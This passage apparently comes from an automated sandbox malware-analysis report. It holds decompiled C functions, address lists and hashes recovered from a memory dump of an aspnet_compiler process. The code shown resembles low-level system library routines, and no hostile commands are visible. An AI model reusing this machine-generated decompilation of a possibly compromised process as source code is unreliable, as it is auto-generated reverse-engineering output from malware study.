									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E01114A2C(0x11c6e40, 0x1114b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E010F7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x10b5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0110F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0110F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E01157016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L010F2400(_t267 + 0x20);
															}
															L010F2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E01102397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E010F2280(_t134, 0x11c8608);
									__eflags =  *0x11c6e48 - _t253; // 0x0
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E010EFFB0(_t198, _t241, 0x11c8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L010F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x11c6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x11c8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E01106B90(_t210,  &_v64);
										_t262 =  *0x11c8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E0110E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E011197C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E0111006A(0x11c8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x11c8608);
												E0111B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x11c6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x11c6e48; // 0x0
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E010EFFB0(_t198, _t240, 0x11c8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E011100C2(0x11c8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}

0x011020a0
0x011020a8
0x011020ad
0x011020b3
0x011020b8
0x011020c2
0x011020c7
0x011020cb
0x011020d2
0x01102263
0x01102266
0x01145836
0x01145836
0x00000000
0x0110226c
0x0110226c
0x01102270
0x01102274
0x011020e2
0x011020e2
0x011020e6
0x011020ee
0x011457dc
0x011457de
0x011457ec
0x011457ec
0x011457f1
0x011457f3
0x011457f8
0x00000000
0x011457f8
0x011457e0
0x011457e4
0x011457ea
0x00000000
0x00000000
0x00000000
0x011457ea
0x011020f4
0x011020f4
0x011020f8
0x011020f8
0x011020fc
0x01102100
0x01102106
0x01102201
0x01102206
0x0110220b
0x0110220e
0x011022a9
0x011022ac
0x00000000
0x00000000
0x011022b2
0x011022b5
0x01145801
0x01145806
0x00000000
0x00000000
0x01145810
0x01145815
0x01145818
0x00000000
0x00000000
0x0114581e
0x011022bb
0x011022bb
0x01102218
0x01102218
0x0110221c
0x01102220
0x01102222
0x011022c2
0x011022c4
0x011022dc
0x011022dc
0x011022e1
0x00000000
0x00000000
0x00000000
0x011022e7
0x011022c8
0x011022cd
0x011022d3
0x011022d6
0x01145823
0x01145825
0x01145827
0x00000000
0x00000000
0x0114582d
0x00000000
0x0114582d
0x00000000
0x01102228
0x01102228
0x00000000
0x01102228
0x01102222
0x01102214
0x01102214
0x00000000
0x01102114
0x01102114
0x01102114
0x0110211a
0x0110211c
0x01102348
0x0110234d
0x01145840
0x01145845
0x01145848
0x0114584e
0x0114584e
0x01145848
0x01102353
0x01102355
0x01102388
0x01102388
0x01102368
0x0110236a
0x0110236c
0x0110238f
0x00000000
0x0110236e
0x0110236e
0x0110218e
0x0110218e
0x01102191
0x01102195
0x01145a03
0x01145a06
0x01145a0c
0x01145a0f
0x01145a11
0x01145a13
0x01145a13
0x01145a19
0x01145a1f
0x00000000
0x0110219b
0x0110219b
0x011021a0
0x01102282
0x01102284
0x01102284
0x01102284
0x01102284
0x011021a6
0x011021a9
0x011021ac
0x011021ae
0x011021b3
0x0110228b
0x01102290
0x01102379
0x01102296
0x01102298
0x01102298
0x01102290
0x011021b9
0x011021be
0x011022a2
0x011022a2
0x011021c4
0x011021c8
0x011021cc
0x011021d0
0x011021d4
0x011021de
0x011021e3
0x01145a29
0x01145a2c
0x00000000
0x00000000
0x01145a3b
0x00000000
0x011021e9
0x011021e9
0x011021e9
0x011021ee
0x011021f1
0x01145a45
0x01145a4b
0x01145a52
0x01145a58
0x01145a5d
0x01145a5f
0x01145a71
0x01145a61
0x01145a6a
0x01145a6a
0x01145a76
0x01145a79
0x01145a7f
0x01145a83
0x01145a85
0x01145a87
0x01145a87
0x01145a8c
0x01145a91
0x01145a97
0x01145a9f
0x01145aa0
0x01145aa1
0x01145aa6
0x01145aab
0x01145ab1
0x01145ab3
0x01145ab9
0x01145aca
0x01145ad4
0x01145ad4
0x01145ade
0x01145ade
0x01145aab
0x01145a79
0x01145a52
0x011021f7
0x011021f9
0x011021fe
0x011021fe
0x011021e3
0x01102195
0x0110236c
0x01102122
0x01102122
0x01102124
0x01102231
0x01102236
0x01102236
0x01102238
0x01102238
0x01102240
0x01102242
0x01102244
0x011459fc
0x0110218c
0x0110218c
0x00000000
0x0110218c
0x0110224a
0x0110224f
0x01102256
0x01102304
0x01102309
0x0110230f
0x0110231e
0x0110231e
0x0110231e
0x01102320
0x01102325
0x0110232a
0x0110232c
0x0110233e
0x0110233e
0x00000000
0x0110232c
0x01102311
0x01102317
0x0110231a
0x0110231c
0x01102380
0x01102380
0x01102380
0x01102384
0x00000000
0x00000000
0x01102386
0x00000000
0x0110231c
0x0110225c
0x0110225c
0x00000000
0x0110225c
0x0110212a
0x01102134
0x01102138
0x0110213d
0x01145858
0x01145863
0x01145863
0x01145867
0x0114586a
0x00000000
0x00000000
0x0114586c
0x0114586c
0x01145871
0x01145875
0x01145877
0x01145997
0x0114599c
0x011459a1
0x011459a7
0x011459a7
0x00000000
0x011459a7
0x0114587d
0x00000000
0x0114588b
0x0114588b
0x01145890
0x01145892
0x01145894
0x01145899
0x0114589b
0x011458a0
0x011458a0
0x011458aa
0x011458b2
0x011458b6
0x011458be
0x011458c6
0x011458c9
0x0114590d
0x01145917
0x0114591a
0x0114591c
0x01145920
0x01145928
0x0114592a
0x0114592c
0x0114592e
0x0114592e
0x011458cb
0x011458cd
0x011458d8
0x011458e0
0x011458f4
0x011458fe
0x011458fe
0x0114593a
0x0114593e
0x01145940
0x01145942
0x00000000
0x01145944
0x01145944
0x01145949
0x0114594e
0x0114594e
0x01145953
0x0114595b
0x01145976
0x01145976
0x0114597a
0x0114597f
0x00000000
0x00000000
0x00000000
0x00000000
0x01145981
0x01145981
0x01145981
0x01145983
0x01145988
0x0114598d
0x01145991
0x01145991
0x00000000
0x0114595d
0x0114595d
0x01145963
0x01145965
0x00000000
0x00000000
0x00000000
0x00000000
0x01145967
0x01145967
0x0114596b
0x0114596d
0x00000000
0x00000000
0x0114596f
0x01145971
0x01145971
0x01145974
0x00000000
0x00000000
0x00000000
0x01145974
0x00000000
0x01145967
0x0114595b
0x01145942
0x01145863
0x01102143
0x01102143
0x01102149
0x0110214f
0x011022f1
0x011022f6
0x00000000
0x01102173
0x01102173
0x0110217d
0x01102181
0x01102186
0x011459ae
0x011459b2
0x011459b5
0x011459b7
0x011459ba
0x011459cd
0x011459d1
0x011459d5
0x011459d9
0x011459db
0x00000000
0x00000000
0x011459dd
0x011459dd
0x011459e1
0x011459e4
0x011459e7
0x011459ee
0x011459ee
0x011459f3
0x011459f3
0x00000000
0x01102186
0x0110214f
0x01102106
0x01102266
0x011020d8
0x011020da
0x011020e0
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27e3a0a5c7ec8982a945013a0f2d0fd935380f37c9b4e3a54b3da64fa60a2fa6
Instruction ID: 7b0070cb16dc23313fa110b1f2a4504a087e09e61f80a9093617146a50afd81d
Opcode Fuzzy Hash: 27e3a0a5c7ec8982a945013a0f2d0fd935380f37c9b4e3a54b3da64fa60a2fa6
Instruction Fuzzy Hash: 20F11335A083428FEB6FCF2CC44476A7BE2AF85714F05852DE9959B2C1D7B4D841CB82

Uniqueness

Uniqueness Score: -1.00%

Function 010E849B Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E010E849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x11af9c0);
				E0112D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x11c7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E010ECEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E010F2280( *[fs:0x30], 0x11c8550);
						_t139 =  *0x11c7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E0110F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E010EFFB0(_t193, _t235, 0x11c8550);
								L5:
								return E0112D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E010D1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x11c7b9c; // 0x0
							_t235 = L010F4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x11c7b10; // 0x0
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E0110A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E010EFFB0(_t193, _t235, 0x11c8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L010F77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L010F77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x11c7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x11c7b10; // 0x0
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E011137C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x11c7b9c; // 0x0
									_t214 = L010F4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E011137F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x11c7b10 =  *0x11c7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x11c7b04 =  *0x11c7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L010F77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L010F77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x11c7b08 =  *0x11c7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E011157C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E0111F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L010F77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E0110A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L010F77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E011196C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x010e849b
0x010e849b
0x010e849b
0x010e849b
0x010e849d
0x010e84a2
0x010e84a7
0x010e84b1
0x010e84d8
0x00000000
0x010e84b3
0x010e84c4
0x010e84c9
0x010e84cd
0x010e84cf
0x010e84cf
0x010e84d6
0x010e84e6
0x010e84e9
0x010e84ec
0x010e84ef
0x010e84f2
0x010e84f4
0x010e84fc
0x010e8501
0x010e8506
0x010e8509
0x010e86e0
0x010e86e5
0x010e86e8
0x010e86ed
0x010e86f0
0x010e86f2
0x01139afd
0x01139b02
0x010e84da
0x010e84df
0x010e84df
0x010e86fa
0x010e86fd
0x010e86fe
0x010e8701
0x010e8706
0x010e8709
0x010e870b
0x00000000
0x00000000
0x010e8711
0x010e8725
0x010e8727
0x010e872a
0x010e872c
0x01139af0
0x01139af5
0x010e8732
0x010e8732
0x010e8732
0x010e8735
0x010e8737
0x010e8515
0x010e8515
0x010e8518
0x010e851d
0x010e8523
0x010e8527
0x010e852b
0x010e8537
0x010e8539
0x010e853c
0x010e853e
0x010e868c
0x010e8691
0x010e8699
0x010e869b
0x010e8744
0x010e8748
0x010e86a1
0x010e86a1
0x010e86a1
0x010e86a4
0x010e86a8
0x01139bdf
0x01139bdf
0x010e86ae
0x010e86b0
0x00000000
0x010e86b6
0x00000000
0x01139be9
0x010e86b0
0x010e8544
0x010e854a
0x010e854d
0x010e8551
0x010e876e
0x010e8778
0x010e877b
0x010e8780
0x010e8557
0x010e8557
0x010e855d
0x010e855d
0x010e856b
0x010e856e
0x010e8570
0x010e8573
0x010e8576
0x010e8576
0x010e8579
0x010e857b
0x00000000
0x00000000
0x010e8581
0x010e85a0
0x010e85a2
0x010e85a5
0x010e85a7
0x01139b1b
0x01139b1b
0x010e862e
0x010e862e
0x010e8631
0x010e8631
0x010e8634
0x010e8636
0x010e8669
0x010e8669
0x010e866b
0x01139bbf
0x01139bc4
0x01139bc8
0x01139bce
0x01139bce
0x010e8671
0x010e8671
0x010e8674
0x010e8676
0x01139bae
0x01139bae
0x010e8676
0x010e867c
0x010e867e
0x010e8688
0x010e8688
0x00000000
0x010e867e
0x010e8638
0x010e8638
0x010e863b
0x010e863e
0x010e863f
0x010e8642
0x010e8645
0x010e8648
0x010e864d
0x01139b69
0x01139b6e
0x01139b7b
0x01139b81
0x01139b85
0x01139b89
0x01139ba7
0x01139b8b
0x01139b91
0x01139b9a
0x01139b9f
0x01139b9f
0x010e8788
0x010e878d
0x010e8763
0x010e8763
0x010e8766
0x00000000
0x010e8766
0x01139b70
0x00000000
0x01139b70
0x010e8656
0x010e865a
0x010e865c
0x010e8752
0x010e8756
0x00000000
0x00000000
0x010e875e
0x00000000
0x010e875e
0x010e8662
0x010e8662
0x010e8662
0x010e8666
0x00000000
0x010e8666
0x010e85b7
0x010e85b9
0x010e85bc
0x010e85bf
0x010e85cc
0x010e85d1
0x010e85d4
0x010e85db
0x010e85de
0x010e85e0
0x01139b5f
0x00000000
0x01139b5f
0x010e85e6
0x010e85ea
0x010e86c3
0x010e86c5
0x010e86c8
0x010e86ca
0x01139b16
0x00000000
0x01139b16
0x010e86d6
0x010e85f6
0x010e85f6
0x010e85f9
0x010e8602
0x010e8606
0x010e860a
0x010e860b
0x010e860e
0x010e8611
0x00000000
0x010e8611
0x010e85f3
0x00000000
0x010e85f3
0x010e8619
0x010e861e
0x010e861e
0x010e8621
0x010e8622
0x010e8623
0x010e8625
0x010e862c
0x00000000
0x010e873d
0x00000000
0x010e873d
0x010e8737
0x010e850f
0x010e8512
0x00000000
0x010e8512
0x00000000
0x010e84d6

Memory Dump Source

Source File: 00000003.00000002.367978673.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: true

Associated: 00000003.00000002.369548088.00000000011CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.369560469.00000000011CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10b0000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: febad4835ce7158f55391590b680aa243c4e6bf4c6cf316bb5a12ba1d5e58690
Instruction ID: 0f14da3bae3239f1513d41d7426a1cd68269e078d65ab7801b5df54a5b7cfb45
Opcode Fuzzy Hash: febad4835ce7158f55391590b680aa243c4e6bf4c6cf316bb5a12ba1d5e58690
Instruction Fuzzy Hash: 8EB14EB0E00209DFDB19DF99C984AADBBF5FF58304F10812AE555AB249D770A945CF50

Uniqueness

Uniqueness Score: -1.00%

Function 010DC600 Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E010DC600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x11cd360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E010E6D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0111B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
